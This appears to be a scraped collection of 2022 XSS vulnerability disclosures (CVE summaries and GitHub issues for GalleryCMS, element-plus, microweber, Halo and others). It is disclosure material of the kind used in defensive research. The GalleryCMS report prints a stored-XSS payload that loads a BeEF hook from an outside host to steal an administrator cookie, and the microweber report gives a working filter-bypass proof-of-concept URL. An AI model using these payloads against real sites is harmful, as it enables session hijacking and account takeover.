A stored cross-site scripting (XSS) vulnerability in /index.php/album/add of GalleryCMS v2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the album_name parameter.

Alert users who are still using the project

*   Conditions: Common user

The POST parameter "album\_name" in the path "/index.php/album/add" has storage XSS. This can result in arbitrary JS code execution, obtaining administrator cookies to obtain administrator permissions, etc

The album name can inject XSS `<svg/onload=$.getScript("http://gp.io:81");>` Introduce hook. Js of beef

![image](https://user-images.githubusercontent.com/53211324/158942427-77cdf290-3413-4320-9315-54367749ccdf.png)

XSS is triggered when the administrator goes online

![image](https://user-images.githubusercontent.com/53211324/158943134-1f3080f6-03d9-4964-b82a-f240346189ba.png)

Beef goes online and gets the cookie

![image](https://user-images.githubusercontent.com/53211324/158942701-8c78735c-fa83-4177-895f-7a68f0fc53b1.png)

CVE-2022-27428: v2.0: stored XSS Vulnerability · Issue #20 · bensonarts/GalleryCMS

XSS in edit page of Hoosk 1.8.0 allows attacker to execute javascript code in user browser via edit page with XSS payload bypass filter some special chars.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28586: XSS on Hoosk v1.8 · Issue #63 · havok89/Hoosk

element-plus 2.0.5 is vulnerable to Cross Site Scripting (XSS) via el-table-column.

Bug Type: **`Component`**

**Environment**

*   Vue Version: `3.2.13`
*   Element Plus Version: `2.0.5`
*   Browser / OS: `UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
*   Build Tool: `Vue CLI`

**Reproduction****Related Component**

*   `el-table-column`

**Reproduction Link**

Github Repo

**Steps to reproduce**

按照 复现项目的 readme 进行构建  
访问 serve  
在 含有 payload 的 address 的列处中划过光标 就可以触发 js 运行导致 xss

**What is Expected?**

渲染img或者不渲染都可以 但不可以执行 JavaScript

**What is actually happening?**

渲染文本内容为 html 并且执行 JavaScript 脚本

**Additional comments**

elementui plus 是一个大仓库导致有许许多多的前端项目依赖其而构建  
show-overflow-tooltip 已经可以通过 github 代码搜索 找到相关项目 并且其中包含一些部分后台管理项目  
建议通知开发者 更新项目与修复该问题  
此外文档中建议添加相关 安全警告

其他相关信息:  
asjdf/element-table-xss-test#1

Reporter:  
@Esonhugh  
@asjdf

CVE-2022-27103: [Bug Report] [Component] [table-column] table-column 中对于 属性 show-overflow-tooltip 处理存在问题 可以导致 XSS · Issue #6514 · element-plus/element-plus

Stored XSS Leads To Session Hijacking in GitHub repository openemr/openemr prior to 6.1.0.1.

CVE-2022-1458

Store XSS in title parameter executing at EditUser Page & EditProducto page in GitHub repository neorazorx/facturascripts prior to 2022.04. Cross-site scripting attacks can have devastating consequences. Code injected into a vulnerable application can exfiltrate data or install malware on the user's machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.

CVE-2022-1457

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 211240.

CVE-2021-38946: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

Crypt Server before 3.3.0 allows XSS in the index view. This is related to serial, computername, and username.

Compare

Choose a tag to compare

**Crypt Server 3.3.0**

Latest

Latest

 grahamgilbert released this

3.3.0

3e4b53f

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

GPG key ID: 4AEE18F83AFDEB23 Learn about vigilant mode.

Compare

Choose a tag to compare

**What's Changed**

*   Fixes a potential XSS vulnerability in the index view by @grahamgilbert in #109
*   Bump django from 2.2.24 to 2.2.27 in /setup by @dependabot in #106
*   Add missing pytz import for timezone support to work by @fortiko in #107
*   Update base image and squash migrations by @grahamgilbert in #110

**New Contributors**

*   @fortiko made their first contribution in #107

**Full Changelog**: 3.2.0...3.3.0

**Contributors**

*   
*   
*   

grahamgilbert, dependabot, and fortiko

**Assets**2

*   Source code (zip)
*   Source code (tar.gz)

CVE-2022-29589: Release Crypt Server 3.3.0 · grahamgilbert/Crypt-Server

Reflected XSS on demo.microweber.org/demo/module/ in GitHub repository microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.

**Description**

Reflected XSS with filter bypass on /demo/module/ using module= & style= parameters.

**Proof of Concept**

    https://demo.microweber.org/demo/module/?module='ont<a>ransitionend=alert(1)'"tabindex=1&style=transition:outline%200.001s&id=x&data-show-ui=admin&class=x&from_url=https://demo.microweber.org
    

Press tab for the alert() to show up.

Okay 3 things to unpack here:

*   " and ' at various places allow breaking out of the html (root cause of the XSS)
*   ont<x>ransitionend gets sanitized to ontransitionend and bypasses the xss filter
*   style="transition:outline 1s" tabindex=1 is the setup you need to trigger a transition without a <style> tag

Took me some time to finally find a XSS payload that runs here :)

I'd suggest you do not allow breaking out of the html here, so filter ' & ". ont<x>ansitionend should be examined, this trick doesn't work in every parameter. Additionally, some js eventhandlers are allowed e.g. onunhandledrejection, you could think about a on.\*= regex.

**Impact**

Execute Arbitrary JavaScript as the attacked user.

It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.

CVE-2022-1439: Reflected XSS on demo.microweber.org/demo/module/ in microweber

Halo-1.5.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via \admin\index.html#/system/tools.

> **What is version of Halo has the issue?**
> 
> 1.5.0
> 
> **What database are you using?**
> 
> Other
> 
> **What is your deployment method?**
> 
> Fat Jar
> 
> **Your site address.**
> 
> _No response_
> 
> **What happened?**
> 
> 作者你好，在部署环境的过程中，发现了一些问题。 希望在下一个版本中，能够进行一些安全的升级。 如下： 导出的文件未加密，可以修改内容，安全隐患： 用户将博客备份开源到互联网，遭到修改，可能导致存储型xss
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159892850-5eb288d2-6794-4084-a28d-c0e23c77dc92.png)
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159892881-83b8fbd8-b64f-4286-b835-a03d4832b858.png) ![图片](https://user-images.githubusercontent.com/69577632/159892920-9282b724-7378-4c1a-b476-adcd84518d35.png)
> 
> json-data 未加密 位置：blog\_footer\_info 可导致，其他位置也一样
> 
> 效果如下：
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159892977-6cb916d7-8783-4de8-af87-0f867ea6766f.png)
> 
> 修复建议： 对备份内容进行加密。。。
> 
> 同样的xss，也可以在该位置得到证实 http://localhost:8090\\admin\\index.html#/system/tools
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159893019-a2ac495a-2e5e-44ee-a898-5c64e606f965.png)
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159893059-1776715a-447c-4879-985f-234542475121.png)
> 
> **Relevant log output**
> 
> _No response_
> 
> **Additional information**
> 
> English report：
> 
> ·Description Stored Cross-site scripting (XSS) vulnerability in halo before 1.5.0 allows remote attackers to inject arbitrary web script or HTML via the halo-1.5.0/admin to index.html#/system/options. resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Administer permission
> 
> ·Discovery process Cross Site Scripting (XSS) vulnerability in halo-1.5.0 via the <textarea> label to
> 
>     1. halo-1.5.0\admin\index.html#/system/options  ,
>        the The Database Backup feature to
>     
>     2. halo-1.5.0\admin\index.html#/system/tools
>     
> 
> Setting website page in : http://localhost:8090\\admin\\index.html#/system/tools ![图片](https://user-images.githubusercontent.com/69577632/159893510-1a0aa29e-716a-4ec2-95bc-370a77980616.png)
> 
> when i clicked label，the options will be save... http://localhost:8090/s/about allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the <textarea> label
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159893567-be2bfae4-55c4-457d-93f0-9abbd5e4abbb.png)
> 
> stored cross-site scripting (XSS) vulnerability in The Database Backup feature. ![图片](https://user-images.githubusercontent.com/69577632/159893758-f854c72a-fbd2-46a1-9e2e-24b70096eb97.png) ![图片](https://user-images.githubusercontent.com/69577632/159893805-a4323716-204e-4187-b37a-850f8feb0d4e.png) when i clicked  
> label，the json-data will be exported.  
> ![图片](https://user-images.githubusercontent.com/69577632/159893848-60ce6fc0-9931-4291-b6e9-306636a503be.png)
> 
> this json-data allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into after the "key":"blog\_footer\_info","value": option
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159893893-a1b77de2-25ab-4857-8694-48eeb24d1f6d.png) if someone import this json-data. this payload will be executed ![图片](https://user-images.githubusercontent.com/69577632/159894416-f6b7b9ba-4fc8-44ff-ae02-2f8bbd43e245.png)
> 
> ![图片](https://user-images.githubusercontent.com/69577632/159893944-545b2eb0-b706-4e36-b8c3-5bbd008ac712.png)

Tag

#xss